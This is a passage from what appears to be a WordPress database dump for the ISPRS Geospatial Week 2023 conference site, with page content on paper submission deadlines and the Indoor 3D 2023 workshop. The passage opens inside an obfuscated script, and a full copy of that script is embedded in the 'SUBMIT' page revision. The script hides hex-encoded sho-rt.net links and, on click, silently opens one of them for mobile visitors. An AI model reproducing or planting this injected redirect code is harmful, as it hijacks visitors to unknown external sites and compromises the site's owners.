_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2022-11-25 23:06:14','2022-11-25 23:06:14','',2580,'https://gsw2023.com/?p=3380',0,'revision','',0),
(3381,1,'2022-11-25 23:21:31','2022-11-25 23:21:31','','esa','','inherit','open','closed','','esa','','','2022-11-25 23:21:31','2022-11-25 23:21:31','',2920,'https://gsw2023.com/wp-content/uploads/2022/11/esa.jpg',0,'attachment','image/jpeg',0),
(3382,1,'2022-11-25 23:31:07','2022-11-25 23:31:07','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"22\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 23:31:07','2022-11-25 23:31:07','',2659,'https://gsw2023.com/?p=3382',0,'revision','',0),
(3383,1,'2022-11-30 17:54:02','2022-11-30 17:54:02','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen 